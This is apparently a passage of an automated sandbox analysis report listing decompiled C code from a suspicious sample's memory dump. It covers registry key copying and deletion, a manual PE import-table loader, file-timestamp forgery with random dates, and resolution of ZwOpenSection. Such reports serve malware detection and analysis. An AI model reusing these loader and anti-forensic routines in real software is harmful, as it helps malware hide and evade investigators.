								E2402BDD4(_v40, _t89, _v36, 0, _t101, _t113);
								RegCloseKey(_v40);
								RegDeleteKeyA(_t101, E24013534(_v28));
							}
							RegCloseKey(_v36);
						}
					}
				} while (_t89 == 0);
				_pop(_t95);
				 *[fs:eax] = _t95;
				_push(0x2402bf4a);
				return E2401135C(_v32);
			}




















                                    0x2402bdd4
                                    0x2402bdd5
                                    0x2402bdd7
                                    0x2402bddf
                                    0x2402bde2
                                    0x2402bde5
                                    0x2402bde9
                                    0x2402bdea
                                    0x2402bdef
                                    0x2402bdf2
                                    0x2402bdf5
                                    0x2402be01
                                    0x2402be10
                                    0x2402be15
                                    0x2402be16
                                    0x2402be1b
                                    0x2402be1e
                                    0x2402be23
                                    0x2402be23
                                    0x2402be2a
                                    0x2402be53
                                    0x2402be57
                                    0x2402be79
                                    0x2402be85
                                    0x2402be85
                                    0x2402be8a
                                    0x2402be90
                                    0x2402be90
                                    0x2402be97
                                    0x2402bebe
                                    0x2402bec2
                                    0x2402beda
                                    0x2402bede
                                    0x2402bef3
                                    0x2402bef5
                                    0x2402bef7
                                    0x2402beff
                                    0x2402bf08
                                    0x2402bf17
                                    0x2402bf17
                                    0x2402bf20
                                    0x2402bf20
                                    0x2402bede
                                    0x2402bf25
                                    0x2402bf2f
                                    0x2402bf32
                                    0x2402bf35
                                    0x2402bf42

                                    APIs
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43,?,00000000,2402BF60), ref: 2402BE4E
                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43), ref: 2402BE74
                                    • RegDeleteValueA.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BE85
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,00002000,00000000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BEB9
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402BED5
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402BEEE
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000200,00000000,?,00002000,00000000), ref: 2402BF08
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402BF17
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000200,00000000,?,00002000,00000000), ref: 2402BF20
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCreateDeleteEnum
                                    • String ID:
                                    • API String ID: 925550085-0
                                    • Opcode ID: 9085b32d7381c6fe84ccec4be7364d85f474614d88883a8a8d7b5b0c79758269
                                    • Instruction ID: fcb5525d51d3c2b823e6a7df952a23a35f130870d7d0118232396dd24fb46ee7
                                    • Opcode Fuzzy Hash: 9085b32d7381c6fe84ccec4be7364d85f474614d88883a8a8d7b5b0c79758269
                                    • Instruction Fuzzy Hash: C941FCB1A00609AFEB41DEE9CD90FAFBBFCEB19204F404064E614E7254DA749A418BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24023A08, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 149libraryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E24023A08(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				intOrPtr _v12;
				void* _v16;
				struct HINSTANCE__* _v20;
				char _v276;
				char _v278;
				char _v284;
				intOrPtr* _t54;
				char* _t71;
				signed int _t73;
				char* _t75;
				char* _t78;
				char* _t80;
				char* _t105;
				char* _t106;
				intOrPtr _t113;
				intOrPtr _t123;
				intOrPtr _t125;
				char** _t126;
				void* _t129;
				intOrPtr _t130;

				_t130 = _t129 + 0xfffffee8;
				_v284 = 0;
				_t123 = _a4;
				_push(_t129);
				_push(0x24023bd1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				_v5 = 1;
				_v12 =  *((intOrPtr*)(_t123 + 4));
				_t54 = E24023858(_t123, 1);
				if( *((intOrPtr*)(_t54 + 4)) <= 0) {
					L21:
					_pop(_t113);
					 *[fs:eax] = _t113;
					_push(0x24023bd8);
					return E24013088( &_v284);
				}
				_v16 =  *_t54 + _v12;
				while(IsBadHugeReadPtr(_v16, 0x14) == 0 &&  *((intOrPtr*)(_v16 + 0xc)) != 0) {
					_t125 = _v12;
					_v20 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _t125);
					__eflags = _v20 - 0xffffffff;
					if(_v20 != 0xffffffff) {
						__eflags =  *(_t123 + 8);
						if(__eflags == 0) {
							 *(_t123 + 8) = E240239C4(1, _t116, __eflags);
						}
						_t71 = E24014B40( *(_t123 + 8),  *(_t123 + 0xc) + 1 << 2);
						_t130 = _t130 + 8;
						_t105 = _t71;
						 *(_t123 + 8) = _t105;
						__eflags = _t105;
						if(_t105 != 0) {
							_t73 =  *(_t123 + 0xc) << 2;
							 *(_t123 + 8) =  &(( *(_t123 + 8))[_t73]);
							 *( *(_t123 + 8)) = _v20;
							 *(_t123 + 8) =  *(_t123 + 8) - _t73;
							 *(_t123 + 0xc) =  *(_t123 + 0xc) + 1;
							_t75 =  *_v16;
							__eflags = _t75;
							if(_t75 == 0) {
								_t78 =  *((intOrPtr*)(_v16 + 0x10)) + _t125;
								_t106 = _t78;
								_t126 = _t78;
							} else {
								_t106 =  &(_t75[_t125]);
								_t126 =  *((intOrPtr*)(_v16 + 0x10)) + _t125;
							}
							while(1) {
								__eflags =  *_t106;
								if( *_t106 == 0) {
									break;
								}
								_push( *_t106);
								_t80 = E2402387C( *_t106);
								__eflags = _t80;
								if(_t80 == 0) {
									_t116 = _v12 +  *_t106;
									__eflags = _v12 +  *_t106;
									E24015460( &_v278, _v12 +  *_t106);
									 *_t126 = GetProcAddress(_v20,  &_v276);
								} else {
									 *_t126 = GetProcAddress(_v20, E2402386C( *_t106) & 0x0000ffff);
								}
								__eflags =  *_t126;
								if( *_t126 != 0) {
									_t126 =  &(_t126[1]);
									_t106 =  &(_t106[4]);
									__eflags = _t106;
									continue;
								} else {
									_t116 = "BuildImportTable: GetProcAddress failed";
									E240130DC(0x2405bb68, "BuildImportTable: GetProcAddress failed");
									_v5 = 0;
									break;
								}
							}
							_t45 =  &_v16;
							 *_t45 = _v16 + 0x14;
							__eflags =  *_t45;
							continue;
						} else {
							E240130DC(0x2405bb68, "BuildImportTable: ReallocMemory failed");
							_v5 = 0;
							goto L21;
						}
					}
					E24013274( &_v284,  *((intOrPtr*)(_v16 + 0xc)) + _t125);
					E24013388(0x2405bb68, _v284, "BuildImportTable: can\'t load library: ");
					_v5 = 0;
					goto L21;
				}
				goto L21;
			}
























                                    0x24023a0b
                                    0x24023a16
                                    0x24023a1c
                                    0x24023a21
                                    0x24023a22
                                    0x24023a27
                                    0x24023a2a
                                    0x24023a2d
                                    0x24023a34
                                    0x24023a3a
                                    0x24023a43
                                    0x24023bb8
                                    0x24023bba
                                    0x24023bbd
                                    0x24023bc0
                                    0x24023bd0
                                    0x24023bd0
                                    0x24023a4e
                                    0x24023b9c
                                    0x24023a5c
                                    0x24023a67
                                    0x24023a6a
                                    0x24023a6e
                                    0x24023aa1
                                    0x24023aa5
                                    0x24023ab1
                                    0x24023ab1
                                    0x24023ac0
                                    0x24023ac5
                                    0x24023ac8
                                    0x24023aca
                                    0x24023acd
                                    0x24023acf
                                    0x24023aec
                                    0x24023aef
                                    0x24023af8
                                    0x24023afa
                                    0x24023afd
                                    0x24023b03
                                    0x24023b05
                                    0x24023b07
                                    0x24023b1f
                                    0x24023b21
                                    0x24023b23
                                    0x24023b09
                                    0x24023b0b
                                    0x24023b15
                                    0x24023b15
                                    0x24023b93
                                    0x24023b93
                                    0x24023b96
                                    0x00000000
                                    0x00000000
                                    0x24023b29
                                    0x24023b2a
                                    0x24023b2f
                                    0x24023b31
                                    0x24023b4f
                                    0x24023b4f
                                    0x24023b5c
                                    0x24023b71
                                    0x24023b33
                                    0x24023b48
                                    0x24023b48
                                    0x24023b73
                                    0x24023b76
                                    0x24023b8d
                                    0x24023b90
                                    0x24023b90
                                    0x00000000
                                    0x24023b78
                                    0x24023b7d
                                    0x24023b82
                                    0x24023b87
                                    0x00000000
                                    0x24023b87
                                    0x24023b76
                                    0x24023b98
                                    0x24023b98
                                    0x24023b98
                                    0x00000000
                                    0x24023ad1
                                    0x24023adb
                                    0x24023ae0
                                    0x00000000
                                    0x24023ae0
                                    0x24023acf
                                    0x24023a7e
                                    0x24023a93
                                    0x24023a98
                                    0x00000000
                                    0x24023a98
                                    0x00000000

                                    APIs
                                    • LoadLibraryA.KERNEL32(00000000,?,00000001,00000000,24023BD1,?,00000000,?,00000000,?,24023F76,?,00004550,00004550,?,00000000), ref: 24023A62
                                    • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 24023BA2
                                    Strings
                                    • BuildImportTable: GetProcAddress failed, xrefs: 24023B7D
                                    • BuildImportTable: ReallocMemory failed, xrefs: 24023AD6
                                    • BuildImportTable: can't load library: , xrefs: 24023A8E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: HugeLibraryLoadRead
                                    • String ID: BuildImportTable: GetProcAddress failed$BuildImportTable: ReallocMemory failed$BuildImportTable: can't load library:
                                    • API String ID: 571923069-1384308123
                                    • Opcode ID: c9af83cfdb07119b580fb341aa8766670f975d331066348f60fd3a040ad83ddc
                                    • Instruction ID: edea111201dcdaddfe67d25f0df0f405e4b5c8f94fac960227cb88b7f2e2cca9
                                    • Opcode Fuzzy Hash: c9af83cfdb07119b580fb341aa8766670f975d331066348f60fd3a040ad83ddc
                                    • Instruction Fuzzy Hash: 71511F70A04619AFDB01CFA8C880B9DF7F4FF19314F4485A5D518EB285D7B4EAC58B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402DD70, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63networkCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 46%
                                    			E2402DD70(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v408;
				intOrPtr* _t10;
				char _t13;
				intOrPtr* _t14;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t29;
				void* _t36;
				void* _t38;
				intOrPtr _t39;
				void* _t41;

				_t41 = __eflags;
				_t36 = _t38;
				_t39 = _t38 + 0xfffffe6c;
				_t20 = __eax;
				E240130DC(__edx, __eax);
				E24013480(_t20, "127.0.0.1");
				if(_t41 != 0) {
					_t10 =  &_v408;
					_push(_t10);
					_push(0x101);
					L240225F0();
					__eflags = _t10;
					if(_t10 != 0) {
						goto L8;
					} else {
						_push(_t36);
						_push(0x2402de18);
						_push( *[fs:eax]);
						 *[fs:eax] = _t39;
						_t13 = E24013534(_t20);
						_push(_t13);
						L24022590();
						_v8 = _t13;
						__eflags = _v8 - 0xffffffff;
						if(_v8 != 0xffffffff) {
							_push(2);
							_push(4);
							_t14 =  &_v8;
							_push(_t14);
							L240225D8();
							_t22 = _t14;
							__eflags = _t22;
							if(_t22 != 0) {
								E24013274(__edx,  *_t22);
							}
							__eflags = 0;
							_pop(_t29);
							 *[fs:eax] = _t29;
							_push(0x2402de1f);
							L240225F8();
							return 0;
						} else {
							L240225F8();
							_t10 = E24012BE8();
							goto L8;
						}
					}
				} else {
					_t10 = E240130DC(__edx, "localhost");
					L8:
					return _t10;
				}
			}















                                    0x2402dd70
                                    0x2402dd71
                                    0x2402dd73
                                    0x2402dd7d
                                    0x2402dd83
                                    0x2402dd8f
                                    0x2402dd94
                                    0x2402dda4
                                    0x2402ddaa
                                    0x2402ddab
                                    0x2402ddb0
                                    0x2402ddb5
                                    0x2402ddb7
                                    0x00000000
                                    0x2402ddb9
                                    0x2402ddbb
                                    0x2402ddbc
                                    0x2402ddc1
                                    0x2402ddc4
                                    0x2402ddc9
                                    0x2402ddce
                                    0x2402ddcf
                                    0x2402ddd4
                                    0x2402ddd7
                                    0x2402dddb
                                    0x2402dde9
                                    0x2402ddeb
                                    0x2402dded
                                    0x2402ddf0
                                    0x2402ddf1
                                    0x2402ddf6
                                    0x2402ddf8
                                    0x2402ddfa
                                    0x2402de00
                                    0x2402de00
                                    0x2402de05
                                    0x2402de07
                                    0x2402de0a
                                    0x2402de0d
                                    0x2402de12
                                    0x2402de17
                                    0x2402dddd
                                    0x2402dddd
                                    0x2402dde2
                                    0x00000000
                                    0x2402dde2
                                    0x2402dddb
                                    0x2402dd96
                                    0x2402dd9d
                                    0x2402de1f
                                    0x2402de24
                                    0x2402de24

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CleanupStartupinet_addr
                                    • String ID: 127.0.0.1$localhost
                                    • API String ID: 4189620951-2339935011
                                    • Opcode ID: 9630872b9d404b1588947f769f6fd1fe7d4285b669600158c76a668d7c0332c3
                                    • Instruction ID: c260ce3db4f5fda0700de2230fbaf203c900a44598fe2e56bc850e46d608601e
                                    • Opcode Fuzzy Hash: 9630872b9d404b1588947f769f6fd1fe7d4285b669600158c76a668d7c0332c3
                                    • Instruction Fuzzy Hash: C3110831704E145BFF41FAF84C9099A72DC9F6C618B5085B7E61CD72C9E9B0CED04292
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240114F4, Relevance: 11.4, APIs: 9, Instructions: 109COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E240114F4(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E240136BC(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                    0x240114f8
                                    0x240114fa
                                    0x24011506
                                    0x24011506
                                    0x24011506
                                    0x2401150a
                                    0x24011504
                                    0x24011504
                                    0x24011506
                                    0x24011506
                                    0x2401150a
                                    0x24011504
                                    0x24011504
                                    0x24011510
                                    0x24011513
                                    0x24011520
                                    0x24011522
                                    0x24011569
                                    0x24011569
                                    0x2401156d
                                    0x00000000
                                    0x00000000
                                    0x24011528
                                    0x2401155c
                                    0x24011565
                                    0x24011567
                                    0x00000000
                                    0x24011567
                                    0x24011530
                                    0x24011542
                                    0x24011542
                                    0x24011546
                                    0x00000000
                                    0x00000000
                                    0x24011535
                                    0x2401153e
                                    0x24011540
                                    0x24011540
                                    0x2401154f
                                    0x24011557
                                    0x24011557
                                    0x2401154f
                                    0x24011573
                                    0x24011578
                                    0x2401157a
                                    0x2401157c
                                    0x240115d1
                                    0x240115d1
                                    0x240115d5
                                    0x00000000
                                    0x00000000
                                    0x24011582
                                    0x240115bd
                                    0x240115c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240115c6
                                    0x240115c6
                                    0x240115c8
                                    0x240115cb
                                    0x240115cc
                                    0x240115cd
                                    0x00000000
                                    0x240115c6
                                    0x2401158a
                                    0x240115a3
                                    0x240115a3
                                    0x240115a7
                                    0x00000000
                                    0x00000000
                                    0x2401158f
                                    0x24011596
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24011598
                                    0x24011598
                                    0x2401159a
                                    0x2401159d
                                    0x2401159e
                                    0x2401159f
                                    0x24011598
                                    0x240115b0
                                    0x240115b8
                                    0x240115b8
                                    0x240115b0
                                    0x240115dd
                                    0x2401151b
                                    0x2401151b
                                    0x00000000
                                    0x2401151b
                                    0x24011513

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000,00000000), ref: 2401152B
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 24011535
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 24011552
                                    • CharNextA.USER32(00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000,00000000), ref: 2401155C
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 24011585
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D), ref: 2401158F
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D), ref: 240115B3
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,24011626,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000), ref: 240115BD
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID:
                                    • API String ID: 3213498283-0
                                    • Opcode ID: 53bc9808c7aaaf10bef2a0b4c7be660ee445fb4df034681d114db59d401db64d
                                    • Instruction ID: 2418bc85b3e5b7a2e25b13f35f6629efb46af35bd37b1afb5207f217da1fe5a5
                                    • Opcode Fuzzy Hash: 53bc9808c7aaaf10bef2a0b4c7be660ee445fb4df034681d114db59d401db64d
                                    • Instruction Fuzzy Hash: 0221B489B48394DAEB2F39F868C07597BCA4B5F04875414B5D58FCF20BE4A08DD6C366
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403F494, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E2403F494(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v5;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				void* _t20;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t40;
				void* _t53;
				void* _t54;
				char _t60;
				intOrPtr _t61;
				intOrPtr _t66;
				intOrPtr _t67;
				struct HWND__* _t69;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t60 = __edx;
				_t54 = __ecx;
				_t73 = _t74;
				_t75 = _t74 + 0xffffffa0;
				if(__edx != 0) {
					_t75 = _t75 + 0xfffffff0;
					_t20 = E24012898(_t20, _t73);
				}
				_v5 = _t60;
				_t53 = _t20;
				_t61 =  *0x2403f17c; // 0x2403f180
				E240139CC( &_v100, _t61);
				 *[fs:eax] = _t75;
				E2403E814(_t54, 0);
				 *((intOrPtr*)( *_t53 + 4))( *[fs:eax], 0x2403f587, _t73);
				_t33 =  *0x2405aa58; // 0x190
				_t34 =  *0x2405b67c; // 0x24010000
				E24013534(_v100);
				_t69 = E240154D4(_v92,  &_v72, 0, _t34, _t33, _t54, _v76, _v80, _v84, _v88, _v96);
				 *(_t53 + 0xc) = _t69;
				if(IsWindow(_t69) != 0) {
					SetPropA( *(_t53 + 0xc), "OBJECT", _t53);
					SetPropA( *(_t53 + 0xc), "WNDPROC", SetWindowLongA( *(_t53 + 0xc), 0xfffffffc, E2403F404));
				}
				_t40 =  *0x2405aa58; // 0x190
				 *((intOrPtr*)(_t53 + 0x10)) = _t40;
				 *0x2405aa58 =  *0x2405aa58 + 1;
				 *((intOrPtr*)( *_t53 + 8))();
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(0x2403f58e);
				_t67 =  *0x2403f17c; // 0x2403f180
				return E24013A90( &_v100, _t67);
			}


























                                    0x2403f494
                                    0x2403f494
                                    0x2403f495
                                    0x2403f497
                                    0x2403f49f
                                    0x2403f4a1
                                    0x2403f4a4
                                    0x2403f4a4
                                    0x2403f4ab
                                    0x2403f4ae
                                    0x2403f4b3
                                    0x2403f4b9
                                    0x2403f4c9
                                    0x2403f4d2
                                    0x2403f4de
                                    0x2403f4f6
                                    0x2403f4fc
                                    0x2403f507
                                    0x2403f519
                                    0x2403f51b
                                    0x2403f526
                                    0x2403f532
                                    0x2403f551
                                    0x2403f551
                                    0x2403f556
                                    0x2403f55b
                                    0x2403f55e
                                    0x2403f568
                                    0x2403f56d
                                    0x2403f570
                                    0x2403f573
                                    0x2403f57b
                                    0x2403f586

                                    APIs
                                    • IsWindow.USER32(00000000), ref: 2403F51F
                                    • SetPropA.USER32(?,OBJECT), ref: 2403F532
                                    • SetWindowLongA.USER32(?,000000FC,Function_0002F404), ref: 2403F542
                                    • SetPropA.USER32(?,WNDPROC,00000000), ref: 2403F551
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: PropWindow$Long
                                    • String ID: OBJECT$WNDPROC
                                    • API String ID: 109861939-55689305
                                    • Opcode ID: b8f2cde3581741474a11c43c416164d5a479efaee05fabb6b2a69ac8dc819c9c
                                    • Instruction ID: 1d2f1fba51eaf9d3371a9f3b69457846cba72164b74373c8b89b8259225635f7
                                    • Opcode Fuzzy Hash: b8f2cde3581741474a11c43c416164d5a479efaee05fabb6b2a69ac8dc819c9c
                                    • Instruction Fuzzy Hash: 67315C75A00244AFEB00DFA9CC80D6EBBFCEB4D2147908164B909EB248DA74ED858B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401757C, Relevance: 10.6, APIs: 7, Instructions: 79filetimeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E2401757C(char __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				struct _FILETIME _v16;
				void* _t43;
				intOrPtr _t46;
				CHAR* _t48;
				void* _t51;

				_v8 = __eax;
				E24013524(_v8);
				_push(_t51);
				_push(0x24017659);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff4;
				E24011644();
				_v16.dwLowDateTime = E24011D10(0x1869f) + 0x1c52fa0;
				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
				_t48 = E24013534(_v8);
				_t43 = CreateFileA(_t48, 0x40000000, 3, 0, 3, 0x80, 0);
				if(_t43 != 0xffffffff) {
					SetFileTime(_t43,  &_v16,  &_v16,  &_v16);
				} else {
					CloseHandle(_t43);
					_t43 = CreateFileA(_t48, 0x40000000, 3, 0, 3, 4, 0);
					if(_t43 != 0xffffffff) {
						SetFileTime(_t43,  &_v16,  &_v16,  &_v16);
					}
					CloseHandle(_t43);
				}
				CloseHandle(_t43);
				_pop(_t46);
				 *[fs:eax] = _t46;
				_push(E24017660);
				return E24013088( &_v8);
			}









                                    0x24017584
                                    0x2401758a
                                    0x24017591
                                    0x24017592
                                    0x24017597
                                    0x2401759a
                                    0x2401759d
                                    0x240175b1
                                    0x240175c3
                                    0x240175e0
                                    0x240175e8
                                    0x240175ed
                                    0x24017638
                                    0x240175ef
                                    0x240175f0
                                    0x2401760a
                                    0x2401760f
                                    0x2401761e
                                    0x2401761e
                                    0x24017624
                                    0x24017624
                                    0x2401763e
                                    0x24017645
                                    0x24017648
                                    0x2401764b
                                    0x24017658

                                    APIs
                                      • Part of subcall function 24011644: GetSystemTime.KERNEL32(?), ref: 2401164E
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175E3
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175F0
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 24017605
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000), ref: 2401761E
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000), ref: 24017624
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 24017638
                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 2401763E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleTime$Create$System
                                    • String ID:
                                    • API String ID: 1407650207-0
                                    • Opcode ID: 248d9557b9827f86a3859ba98dfe5ca60f5e8233a2f1db804991b18af16d4c39
                                    • Instruction ID: cce0819a14111f05abb4ab3b1e489f85c6af480bc88e6038b0c6e40ae658b53f
                                    • Opcode Fuzzy Hash: 248d9557b9827f86a3859ba98dfe5ca60f5e8233a2f1db804991b18af16d4c39
                                    • Instruction Fuzzy Hash: 2421D5B5A00208BAF712E7B4DC81F9E77ECEB18618F500161B218FA1C5DB74AB804754
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2405352C, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 19libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2405352C() {
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;

				 *0x2405aab4 = LoadLibraryA("ntdll.dll");
				if( *0x2405aab4 != 0) {
					_t2 =  *0x2405aab4; // 0x0
					 *0x2405aaac = GetProcAddress(_t2, "RtlInitUnicodeString");
					_t4 =  *0x2405aab4; // 0x0
					 *0x2405aab0 = GetProcAddress(_t4, "ZwOpenSection");
					return 1;
				} else {
					return 0;
				}
			}





                                    0x24053536
                                    0x24053542
                                    0x2405354c
                                    0x24053557
                                    0x24053561
                                    0x2405356c
                                    0x24053573
                                    0x24053544
                                    0x24053546
                                    0x24053546

                                    APIs
